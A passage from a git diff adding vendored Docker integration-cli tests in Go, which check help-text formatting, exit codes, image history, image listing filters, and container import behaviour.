+		helpCmd.Env = newEnvs
+		out, _, err := runCommandWithOutput(helpCmd)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		lines := strings.Split(out, "\n")
+		for _, line := range lines {
+			// All lines should not end with a space
+			c.Assert(line, checker.Not(checker.HasSuffix), " ", check.Commentf("Line should not end with a space"))
+
+			if scanForHome && strings.Contains(line, `=`+home) {
+				c.Fatalf("Line should use '%q' instead of %q:\n%s", homedir.GetShortcutString(), home, line)
+			}
+			if runtime.GOOS != "windows" {
+				i := strings.Index(line, homedir.GetShortcutString())
+				if i >= 0 && i != len(line)-1 && line[i+1] != '/' {
+					c.Fatalf("Main help should not have used home shortcut:\n%s", line)
+				}
+			}
+		}
+
+		// Make sure each cmd's help text fits within 90 chars and that
+		// on non-windows system we use ~ when possible (to shorten things).
+		// Pull the list of commands from the "Commands:" section of docker help
+		helpCmd = exec.Command(dockerBinary, "help")
+		helpCmd.Env = newEnvs
+		out, _, err = runCommandWithOutput(helpCmd)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		i := strings.Index(out, "Commands:")
+		c.Assert(i, checker.GreaterOrEqualThan, 0, check.Commentf("Missing 'Commands:' in:\n%s", out))
+
+		cmds := []string{}
+		// Grab all chars starting at "Commands:"
+		helpOut := strings.Split(out[i:], "\n")
+		// Skip first line, it is just "Commands:"
+		helpOut = helpOut[1:]
+
+		// Create the list of commands we want to test
+		cmdsToTest := []string{}
+		for _, cmd := range helpOut {
+			// Stop on blank line or non-idented line
+			if cmd == "" || !unicode.IsSpace(rune(cmd[0])) {
+				break
+			}
+
+			// Grab just the first word of each line
+			cmd = strings.Split(strings.TrimSpace(cmd), " ")[0]
+			cmds = append(cmds, cmd) // Saving count for later
+
+			cmdsToTest = append(cmdsToTest, cmd)
+		}
+
+		// Add some 'two word' commands - would be nice to automatically
+		// calculate this list - somehow
+		cmdsToTest = append(cmdsToTest, "volume create")
+		cmdsToTest = append(cmdsToTest, "volume inspect")
+		cmdsToTest = append(cmdsToTest, "volume ls")
+		cmdsToTest = append(cmdsToTest, "volume rm")
+		cmdsToTest = append(cmdsToTest, "network connect")
+		cmdsToTest = append(cmdsToTest, "network create")
+		cmdsToTest = append(cmdsToTest, "network disconnect")
+		cmdsToTest = append(cmdsToTest, "network inspect")
+		cmdsToTest = append(cmdsToTest, "network ls")
+		cmdsToTest = append(cmdsToTest, "network rm")
+
+		if experimentalDaemon {
+			cmdsToTest = append(cmdsToTest, "checkpoint create")
+			cmdsToTest = append(cmdsToTest, "checkpoint ls")
+			cmdsToTest = append(cmdsToTest, "checkpoint rm")
+		}
+
+		// Divide the list of commands into go routines and  run the func testcommand on the commands in parallel
+		// to save runtime of test
+
+		errChan := make(chan error)
+
+		for index := 0; index < len(cmdsToTest); index++ {
+			go func(index int) {
+				errChan <- testCommand(cmdsToTest[index], newEnvs, scanForHome, home)
+			}(index)
+		}
+
+		for index := 0; index < len(cmdsToTest); index++ {
+			err := <-errChan
+			if err != nil {
+				c.Fatal(err)
+			}
+		}
+	}
+}
+
+func (s *DockerSuite) TestHelpExitCodesHelpOutput(c *check.C) {
+	// Test to make sure the exit code and output (stdout vs stderr) of
+	// various good and bad cases are what we expect
+
+	// docker : stdout=all, stderr=empty, rc=0
+	out, _, err := dockerCmdWithError()
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	// Be really pick
+	c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker'\n"))
+
+	// docker help: stdout=all, stderr=empty, rc=0
+	out, _, err = dockerCmdWithError("help")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	// Be really pick
+	c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker help'\n"))
+
+	// docker --help: stdout=all, stderr=empty, rc=0
+	out, _, err = dockerCmdWithError("--help")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	// Be really pick
+	c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker --help'\n"))
+
+	// docker inspect busybox: stdout=all, stderr=empty, rc=0
+	// Just making sure stderr is empty on valid cmd
+	out, _, err = dockerCmdWithError("inspect", "busybox")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	// Be really pick
+	c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker inspect busyBox'\n"))
+
+	// docker rm: stdout=empty, stderr=all, rc!=0
+	// testing the min arg error msg
+	cmd := exec.Command(dockerBinary, "rm")
+	stdout, stderr, _, err := runCommandWithStdoutStderr(cmd)
+	c.Assert(err, checker.NotNil)
+	c.Assert(stdout, checker.Equals, "")
+	// Should not contain full help text but should contain info about
+	// # of args and Usage line
+	c.Assert(stderr, checker.Contains, "requires at least 1 argument", check.Commentf("Missing # of args text from 'docker rm'\n"))
+
+	// docker rm NoSuchContainer: stdout=empty, stderr=all, rc=0
+	// testing to make sure no blank line on error
+	cmd = exec.Command(dockerBinary, "rm", "NoSuchContainer")
+	stdout, stderr, _, err = runCommandWithStdoutStderr(cmd)
+	c.Assert(err, checker.NotNil)
+	c.Assert(len(stderr), checker.Not(checker.Equals), 0)
+	c.Assert(stdout, checker.Equals, "")
+	// Be really picky
+	c.Assert(stderr, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker rm'\n"))
+
+	// docker BadCmd: stdout=empty, stderr=all, rc=0
+	cmd = exec.Command(dockerBinary, "BadCmd")
+	stdout, stderr, _, err = runCommandWithStdoutStderr(cmd)
+	c.Assert(err, checker.NotNil)
+	c.Assert(stdout, checker.Equals, "")
+	c.Assert(stderr, checker.Equals, "docker: 'BadCmd' is not a docker command.\nSee 'docker --help'\n", check.Commentf("Unexcepted output for 'docker badCmd'\n"))
+}
+
+func testCommand(cmd string, newEnvs []string, scanForHome bool, home string) error {
+
+	args := strings.Split(cmd+" --help", " ")
+
+	// Check the full usage text
+	helpCmd := exec.Command(dockerBinary, args...)
+	helpCmd.Env = newEnvs
+	out, stderr, _, err := runCommandWithStdoutStderr(helpCmd)
+	if len(stderr) != 0 {
+		return fmt.Errorf("Error on %q help. non-empty stderr:%q\n", cmd, stderr)
+	}
+	if strings.HasSuffix(out, "\n\n") {
+		return fmt.Errorf("Should not have blank line on %q\n", cmd)
+	}
+	if !strings.Contains(out, "--help") {
+		return fmt.Errorf("All commands should mention '--help'. Command '%v' did not.\n", cmd)
+	}
+
+	if err != nil {
+		return fmt.Errorf(out)
+	}
+
+	// Check each line for lots of stuff
+	lines := strings.Split(out, "\n")
+	for _, line := range lines {
+		i := strings.Index(line, "~")
+		if i >= 0 && i != len(line)-1 && line[i+1] != '/' {
+			return fmt.Errorf("Help for %q should not have used ~:\n%s", cmd, line)
+		}
+
+		// If a line starts with 4 spaces then assume someone
+		// added a multi-line description for an option and we need
+		// to flag it
+		if strings.HasPrefix(line, "    ") &&
+			!strings.HasPrefix(strings.TrimLeft(line, " "), "--") {
+			return fmt.Errorf("Help for %q should not have a multi-line option", cmd)
+		}
+
+		// Options should NOT end with a period
+		if strings.HasPrefix(line, "  -") && strings.HasSuffix(line, ".") {
+			return fmt.Errorf("Help for %q should not end with a period: %s", cmd, line)
+		}
+
+		// Options should NOT end with a space
+		if strings.HasSuffix(line, " ") {
+			return fmt.Errorf("Help for %q should not end with a space: %s", cmd, line)
+		}
+
+	}
+
+	// For each command make sure we generate an error
+	// if we give a bad arg
+	args = strings.Split(cmd+" --badArg", " ")
+
+	out, _, err = dockerCmdWithError(args...)
+	if err == nil {
+		return fmt.Errorf(out)
+	}
+
+	// Be really picky
+	if strings.HasSuffix(stderr, "\n\n") {
+		return fmt.Errorf("Should not have a blank line at the end of 'docker rm'\n")
+	}
+
+	// Now make sure that each command will print a short-usage
+	// (not a full usage - meaning no opts section) if we
+	// are missing a required arg or pass in a bad arg
+
+	// These commands will never print a short-usage so don't test
+	noShortUsage := map[string]string{
+		"images":        "",
+		"login":         "",
+		"logout":        "",
+		"network":       "",
+		"stats":         "",
+		"volume create": "",
+	}
+
+	if _, ok := noShortUsage[cmd]; !ok {
+		// skipNoArgs are ones that we don't want to try w/o
+		// any args. Either because it'll hang the test or
+		// lead to incorrect test result (like false negative).
+		// Whatever the reason, skip trying to run w/o args and
+		// jump to trying with a bogus arg.
+		skipNoArgs := map[string]struct{}{
+			"daemon": {},
+			"events": {},
+			"load":   {},
+		}
+
+		var result *icmd.Result
+		if _, ok := skipNoArgs[cmd]; !ok {
+			result = dockerCmdWithResult(strings.Split(cmd, " ")...)
+		}
+
+		// If its ok w/o any args then try again with an arg
+		if result == nil || result.ExitCode == 0 {
+			result = dockerCmdWithResult(strings.Split(cmd+" badArg", " ")...)
+		}
+
+		if err := result.Compare(icmd.Expected{
+			Out:      icmd.None,
+			Err:      "\nUsage:",
+			ExitCode: 1,
+		}); err != nil {
+			return err
+		}
+
+		stderr := result.Stderr()
+		// Shouldn't have full usage
+		if strings.Contains(stderr, "--help=false") {
+			return fmt.Errorf("Should not have full usage on %q:%v", result.Cmd.Args, stderr)
+		}
+		if strings.HasSuffix(stderr, "\n\n") {
+			return fmt.Errorf("Should not have a blank line on %q\n%v", result.Cmd.Args, stderr)
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go
new file mode 100644
index 0000000000..9979080b1c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go
@@ -0,0 +1,121 @@
+package main
+
+import (
+	"fmt"
+	"regexp"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// This is a heisen-test.  Because the created timestamp of images and the behavior of
+// sort is not predictable it doesn't always fail.
+func (s *DockerSuite) TestBuildHistory(c *check.C) {
+	name := "testbuildhistory"
+	_, err := buildImage(name, `FROM `+minimalBaseImage()+`
+LABEL label.A="A"
+LABEL label.B="B"
+LABEL label.C="C"
+LABEL label.D="D"
+LABEL label.E="E"
+LABEL label.F="F"
+LABEL label.G="G"
+LABEL label.H="H"
+LABEL label.I="I"
+LABEL label.J="J"
+LABEL label.K="K"
+LABEL label.L="L"
+LABEL label.M="M"
+LABEL label.N="N"
+LABEL label.O="O"
+LABEL label.P="P"
+LABEL label.Q="Q"
+LABEL label.R="R"
+LABEL label.S="S"
+LABEL label.T="T"
+LABEL label.U="U"
+LABEL label.V="V"
+LABEL label.W="W"
+LABEL label.X="X"
+LABEL label.Y="Y"
+LABEL label.Z="Z"`,
+		true)
+
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "history", "testbuildhistory")
+	actualValues := strings.Split(out, "\n")[1:27]
+	expectedValues := [26]string{"Z", "Y", "X", "W", "V", "U", "T", "S", "R", "Q", "P", "O", "N", "M", "L", "K", "J", "I", "H", "G", "F", "E", "D", "C", "B", "A"}
+
+	for i := 0; i < 26; i++ {
+		echoValue := fmt.Sprintf("LABEL label.%s=%s", expectedValues[i], expectedValues[i])
+		actualValue := actualValues[i]
+		c.Assert(actualValue, checker.Contains, echoValue)
+	}
+
+}
+
+func (s *DockerSuite) TestHistoryExistentImage(c *check.C) {
+	dockerCmd(c, "history", "busybox")
+}
+
+func (s *DockerSuite) TestHistoryNonExistentImage(c *check.C) {
+	_, _, err := dockerCmdWithError("history", "testHistoryNonExistentImage")
+	c.Assert(err, checker.NotNil, check.Commentf("history on a non-existent image should fail."))
+}
+
+func (s *DockerSuite) TestHistoryImageWithComment(c *check.C) {
+	name := "testhistoryimagewithcomment"
+
+	// make an image through docker commit <container id> [ -m messages ]
+
+	dockerCmd(c, "run", "--name", name, "busybox", "true")
+	dockerCmd(c, "wait", name)
+
+	comment := "This_is_a_comment"
+	dockerCmd(c, "commit", "-m="+comment, name, name)
+
+	// test docker history <image id> to check comment messages
+
+	out, _ := dockerCmd(c, "history", name)
+	outputTabs := strings.Fields(strings.Split(out, "\n")[1])
+	actualValue := outputTabs[len(outputTabs)-1]
+	c.Assert(actualValue, checker.Contains, comment)
+}
+
+func (s *DockerSuite) TestHistoryHumanOptionFalse(c *check.C) {
+	out, _ := dockerCmd(c, "history", "--human=false", "busybox")
+	lines := strings.Split(out, "\n")
+	sizeColumnRegex, _ := regexp.Compile("SIZE +")
+	indices := sizeColumnRegex.FindStringIndex(lines[0])
+	startIndex := indices[0]
+	endIndex := indices[1]
+	for i := 1; i < len(lines)-1; i++ {
+		if endIndex > len(lines[i]) {
+			endIndex = len(lines[i])
+		}
+		sizeString := lines[i][startIndex:endIndex]
+
+		_, err := strconv.Atoi(strings.TrimSpace(sizeString))
+		c.Assert(err, checker.IsNil, check.Commentf("The size '%s' was not an Integer", sizeString))
+	}
+}
+
+func (s *DockerSuite) TestHistoryHumanOptionTrue(c *check.C) {
+	out, _ := dockerCmd(c, "history", "--human=true", "busybox")
+	lines := strings.Split(out, "\n")
+	sizeColumnRegex, _ := regexp.Compile("SIZE +")
+	humanSizeRegexRaw := "\\d+.*B" // Matches human sizes like 10 MB, 3.2 KB, etc
+	indices := sizeColumnRegex.FindStringIndex(lines[0])
+	startIndex := indices[0]
+	endIndex := indices[1]
+	for i := 1; i < len(lines)-1; i++ {
+		if endIndex > len(lines[i]) {
+			endIndex = len(lines[i])
+		}
+		sizeString := lines[i][startIndex:endIndex]
+		c.Assert(strings.TrimSpace(sizeString), checker.Matches, humanSizeRegexRaw, check.Commentf("The size '%s' was not in human format", sizeString))
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go
new file mode 100644
index 0000000000..3b678a2586
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go
@@ -0,0 +1,364 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"sort"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestImagesEnsureImageIsListed(c *check.C) {
+	imagesOut, _ := dockerCmd(c, "images")
+	c.Assert(imagesOut, checker.Contains, "busybox")
+}
+
+func (s *DockerSuite) TestImagesEnsureImageWithTagIsListed(c *check.C) {
+	name := "imagewithtag"
+	dockerCmd(c, "tag", "busybox", name+":v1")
+	dockerCmd(c, "tag", "busybox", name+":v1v1")
+	dockerCmd(c, "tag", "busybox", name+":v2")
+
+	imagesOut, _ := dockerCmd(c, "images", name+":v1")
+	c.Assert(imagesOut, checker.Contains, name)
+	c.Assert(imagesOut, checker.Contains, "v1")
+	c.Assert(imagesOut, checker.Not(checker.Contains), "v2")
+	c.Assert(imagesOut, checker.Not(checker.Contains), "v1v1")
+
+	imagesOut, _ = dockerCmd(c, "images", name)
+	c.Assert(imagesOut, checker.Contains, name)
+	c.Assert(imagesOut, checker.Contains, "v1")
+	c.Assert(imagesOut, checker.Contains, "v1v1")
+	c.Assert(imagesOut, checker.Contains, "v2")
+}
+
+func (s *DockerSuite) TestImagesEnsureImageWithBadTagIsNotListed(c *check.C) {
+	imagesOut, _ := dockerCmd(c, "images", "busybox:nonexistent")
+	c.Assert(imagesOut, checker.Not(checker.Contains), "busybox")
+}
+
+func (s *DockerSuite) TestImagesOrderedByCreationDate(c *check.C) {
+	id1, err := buildImage("order:test_a",
+		`FROM busybox
+                MAINTAINER dockerio1`, true)
+	c.Assert(err, checker.IsNil)
+	time.Sleep(1 * time.Second)
+	id2, err := buildImage("order:test_c",
+		`FROM busybox
+                MAINTAINER dockerio2`, true)
+	c.Assert(err, checker.IsNil)
+	time.Sleep(1 * time.Second)
+	id3, err := buildImage("order:test_b",
+		`FROM busybox
+                MAINTAINER dockerio3`, true)
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "images", "-q", "--no-trunc")
+	imgs := strings.Split(out, "\n")
+	c.Assert(imgs[0], checker.Equals, id3, check.Commentf("First image must be %s, got %s", id3, imgs[0]))
+	c.Assert(imgs[1], checker.Equals, id2, check.Commentf("First image must be %s, got %s", id2, imgs[1]))
+	c.Assert(imgs[2], checker.Equals, id1, check.Commentf("First image must be %s, got %s", id1, imgs[2]))
+}
+
+func (s *DockerSuite) TestImagesErrorWithInvalidFilterNameTest(c *check.C) {
+	out, _, err := dockerCmdWithError("images", "-f", "FOO=123")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Invalid filter")
+}
+
+func (s *DockerSuite) TestImagesFilterLabelMatch(c *check.C) {
+	imageName1 := "images_filter_test1"
+	imageName2 := "images_filter_test2"
+	imageName3 := "images_filter_test3"
+	image1ID, err := buildImage(imageName1,
+		`FROM busybox
+                 LABEL match me`, true)
+	c.Assert(err, check.IsNil)
+
+	image2ID, err := buildImage(imageName2,
+		`FROM busybox
+                 LABEL match="me too"`, true)
+	c.Assert(err, check.IsNil)
+
+	image3ID, err := buildImage(imageName3,
+		`FROM busybox
+                 LABEL nomatch me`, true)
+	c.Assert(err, check.IsNil)
+
+	out, _ := dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match")
+	out = strings.TrimSpace(out)
+	c.Assert(out, check.Matches, fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image1ID))
+	c.Assert(out, check.Matches, fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image2ID))
+	c.Assert(out, check.Not(check.Matches), fmt.Sprintf("[\\s\\w:]*%s[\\s\\w:]*", image3ID))
+
+	out, _ = dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=match=me too")
+	out = strings.TrimSpace(out)
+	c.Assert(out, check.Equals, image2ID)
+}
+
+// Regression : #15659
+func (s *DockerSuite) TestImagesFilterLabelWithCommit(c *check.C) {
+	// Create a container
+	dockerCmd(c, "run", "--name", "bar", "busybox", "/bin/sh")
+	// Commit with labels "using changes"
+	out, _ := dockerCmd(c, "commit", "-c", "LABEL foo.version=1.0.0-1", "-c", "LABEL foo.name=bar", "-c", "LABEL foo.author=starlord", "bar", "bar:1.0.0-1")
+	imageID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "images", "--no-trunc", "-q", "-f", "label=foo.version=1.0.0-1")
+	out = strings.TrimSpace(out)
+	c.Assert(out, check.Equals, imageID)
+}
+
+func (s *DockerSuite) TestImagesFilterSinceAndBefore(c *check.C) {
+	imageID1, err := buildImage("image:1", `FROM `+minimalBaseImage()+`
+LABEL number=1`, true)
+	c.Assert(err, checker.IsNil)
+	imageID2, err := buildImage("image:2", `FROM `+minimalBaseImage()+`
+LABEL number=2`, true)
+	c.Assert(err, checker.IsNil)
+	imageID3, err := buildImage("image:3", `FROM `+minimalBaseImage()+`
+LABEL number=3`, true)
+	c.Assert(err, checker.IsNil)
+
+	expected := []string{imageID3, imageID2}
+
+	out, _ := dockerCmd(c, "images", "-f", "since=image:1", "image")
+	c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out))
+
+	out, _ = dockerCmd(c, "images", "-f", "since="+imageID1, "image")
+	c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out))
+
+	expected = []string{imageID3}
+
+	out, _ = dockerCmd(c, "images", "-f", "since=image:2", "image")
+	c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out))
+
+	out, _ = dockerCmd(c, "images", "-f", "since="+imageID2, "image")
+	c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("SINCE filter: Image list is not in the correct order: %v\n%s", expected, out))
+
+	expected = []string{imageID2, imageID1}
+
+	out, _ = dockerCmd(c, "images", "-f", "before=image:3", "image")
+	c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out))
+
+	out, _ = dockerCmd(c, "images", "-f", "before="+imageID3, "image")
+	c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out))
+
+	expected = []string{imageID1}
+
+	out, _ = dockerCmd(c, "images", "-f", "before=image:2", "image")
+	c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out))
+
+	out, _ = dockerCmd(c, "images", "-f", "before="+imageID2, "image")
+	c.Assert(assertImageList(out, expected), checker.Equals, true, check.Commentf("BEFORE filter: Image list is not in the correct order: %v\n%s", expected, out))
+}
+
+func assertImageList(out string, expected []string) bool {
+	lines := strings.Split(strings.Trim(out, "\n "), "\n")
+
+	if len(lines)-1 != len(expected) {
+		return false
+	}
+
+	imageIDIndex := strings.Index(lines[0], "IMAGE ID")
+	for i := 0; i < len(expected); i++ {
+		imageID := lines[i+1][imageIDIndex : imageIDIndex+12]
+		found := false
+		for _, e := range expected {
+			if imageID == e[7:19] {
+				found = true
+				break
+			}
+		}
+		if !found {
+			return false
+		}
+	}
+
+	return true
+}
+
+func (s *DockerSuite) TestImagesFilterSpaceTrimCase(c *check.C) {
+	imageName := "images_filter_test"
+	buildImage(imageName,
+		`FROM busybox
+                 RUN touch /test/foo
+                 RUN touch /test/bar
+                 RUN touch /test/baz`, true)
+
+	filters := []string{
+		"dangling=true",
+		"Dangling=true",
+		" dangling=true",
+		"dangling=true ",
+		"dangling = true",
+	}
+
+	imageListings := make([][]string, 5, 5)
+	for idx, filter := range filters {
+		out, _ := dockerCmd(c, "images", "-q", "-f", filter)
+		listing := strings.Split(out, "\n")
+		sort.Strings(listing)
+		imageListings[idx] = listing
+	}
+
+	for idx, listing := range imageListings {
+		if idx < 4 && !reflect.DeepEqual(listing, imageListings[idx+1]) {
+			for idx, errListing := range imageListings {
+				fmt.Printf("out %d\n", idx)
+				for _, image := range errListing {
+					fmt.Print(image)
+				}
+				fmt.Print("")
+			}
+			c.Fatalf("All output must be the same")
+		}
+	}
+}
+
+func (s *DockerSuite) TestImagesEnsureDanglingImageOnlyListedOnce(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// create container 1
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+	containerID1 := strings.TrimSpace(out)
+
+	// tag as foobox
+	out, _ = dockerCmd(c, "commit", containerID1, "foobox")
+	imageID := stringid.TruncateID(strings.TrimSpace(out))
+
+	// overwrite the tag, making the previous image dangling
+	dockerCmd(c, "tag", "busybox", "foobox")
+
+	out, _ = dockerCmd(c, "images", "-q", "-f", "dangling=true")
+	// Expect one dangling image
+	c.Assert(strings.Count(out, imageID), checker.Equals, 1)
+
+	out, _ = dockerCmd(c, "images", "-q", "-f", "dangling=false")
+	//dangling=false would not include dangling images
+	c.Assert(out, checker.Not(checker.Contains), imageID)
+
+	out, _ = dockerCmd(c, "images")
+	//docker images still include dangling images
+	c.Assert(out, checker.Contains, imageID)
+
+}
+
+func (s *DockerSuite) TestImagesWithIncorrectFilter(c *check.C) {
+	out, _, err := dockerCmdWithError("images", "-f", "dangling=invalid")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "Invalid filter")
+}
+
+func (s *DockerSuite) TestImagesEnsureOnlyHeadsImagesShown(c *check.C) {
+	dockerfile := `
+        FROM busybox
+        MAINTAINER docker
+        ENV foo bar`
+
+	head, out, err := buildImageWithOut("scratch-image", dockerfile, false)
+	c.Assert(err, check.IsNil)
+
+	// this is just the output of docker build
+	// we're interested in getting the image id of the MAINTAINER instruction
+	// and that's located at output, line 5, from 7 to end
+	split := strings.Split(out, "\n")
+	intermediate := strings.TrimSpace(split[5][7:])
+
+	out, _ = dockerCmd(c, "images")
+	// images shouldn't show non-heads images
+	c.Assert(out, checker.Not(checker.Contains), intermediate)
+	// images should contain final built images
+	c.Assert(out, checker.Contains, stringid.TruncateID(head))
+}
+
+func (s *DockerSuite) TestImagesEnsureImagesFromScratchShown(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support FROM scratch
+
+	dockerfile := `
+        FROM scratch
+        MAINTAINER docker`
+
+	id, _, err := buildImageWithOut("scratch-image", dockerfile, false)
+	c.Assert(err, check.IsNil)
+
+	out, _ := dockerCmd(c, "images")
+	// images should contain images built from scratch
+	c.Assert(out, checker.Contains, stringid.TruncateID(id))
+}
+
+// For W2W - equivalent to TestImagesEnsureImagesFromScratchShown but Windows
+// doesn't support from scratch
+func (s *DockerSuite) TestImagesEnsureImagesFromBusyboxShown(c *check.C) {
+	dockerfile := `
+        FROM busybox
+        MAINTAINER docker`
+
+	id, _, err := buildImageWithOut("busybox-image", dockerfile, false)
+	c.Assert(err, check.IsNil)
+
+	out, _ := dockerCmd(c, "images")
+	// images should contain images built from busybox
+	c.Assert(out, checker.Contains, stringid.TruncateID(id))
+}
+
+// #18181
+func (s *DockerSuite) TestImagesFilterNameWithPort(c *check.C) {
+	tag := "a.b.c.d:5000/hello"
+	dockerCmd(c, "tag", "busybox", tag)
+	out, _ := dockerCmd(c, "images", tag)
+	c.Assert(out, checker.Contains, tag)
+
+	out, _ = dockerCmd(c, "images", tag+":latest")
+	c.Assert(out, checker.Contains, tag)
+
+	out, _ = dockerCmd(c, "images", tag+":no-such-tag")
+	c.Assert(out, checker.Not(checker.Contains), tag)
+}
+
+func (s *DockerSuite) TestImagesFormat(c *check.C) {
+	// testRequires(c, DaemonIsLinux)
+	tag := "myimage"
+	dockerCmd(c, "tag", "busybox", tag+":v1")
+	dockerCmd(c, "tag", "busybox", tag+":v2")
+
+	out, _ := dockerCmd(c, "images", "--format", "{{.Repository}}", tag)
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+
+	expected := []string{"myimage", "myimage"}
+	var names []string
+	names = append(names, lines...)
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
+}
+
+// ImagesDefaultFormatAndQuiet
+func (s *DockerSuite) TestImagesFormatDefaultFormat(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	// create container 1
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+	containerID1 := strings.TrimSpace(out)
+
+	// tag as foobox
+	out, _ = dockerCmd(c, "commit", containerID1, "myimage")
+	imageID := stringid.TruncateID(strings.TrimSpace(out))
+
+	config := `{
+		"imagesFormat": "{{ .ID }} default"
+}`
+	d, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(d)
+
+	err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644)
+	c.Assert(err, checker.IsNil)
+
+	out, _ = dockerCmd(c, "--config", d, "images", "-q", "myimage")
+	c.Assert(out, checker.Equals, imageID+"\n", check.Commentf("Expected to print only the image id, got %v\n", out))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go
new file mode 100644
index 0000000000..57dc2a6698
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go
@@ -0,0 +1,150 @@
+package main
+
+import (
+	"bufio"
+	"compress/gzip"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"regexp"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestImportDisplay(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "export", cleanedContainerID),
+		exec.Command(dockerBinary, "import", "-"),
+	)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't"))
+
+	image := strings.TrimSpace(out)
+	out, _ = dockerCmd(c, "run", "--rm", image, "true")
+	c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing."))
+}
+
+func (s *DockerSuite) TestImportBadURL(c *check.C) {
+	out, _, err := dockerCmdWithError("import", "http://nourl/bad")
+	c.Assert(err, checker.NotNil, check.Commentf("import was supposed to fail but didn't"))
+	// Depending on your system you can get either of these errors
+	if !strings.Contains(out, "dial tcp") &&
+		!strings.Contains(out, "ApplyLayer exit status 1 stdout:  stderr: archive/tar: invalid tar header") &&
+		!strings.Contains(out, "Error processing tar file") {
+		c.Fatalf("expected an error msg but didn't get one.\nErr: %v\nOut: %v", err, out)
+	}
+}
+
+func (s *DockerSuite) TestImportFile(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name", "test-import", "busybox", "true")
+
+	temporaryFile, err := ioutil.TempFile("", "exportImportTest")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
+	defer os.Remove(temporaryFile.Name())
+
+	runCmd := exec.Command(dockerBinary, "export", "test-import")
+	runCmd.Stdout = bufio.NewWriter(temporaryFile)
+
+	_, err = runCommand(runCmd)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to export a container"))
+
+	out, _ := dockerCmd(c, "import", temporaryFile.Name())
+	c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't"))
+	image := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "run", "--rm", image, "true")
+	c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing."))
+}
+
+func (s *DockerSuite) TestImportGzipped(c *check.C) {
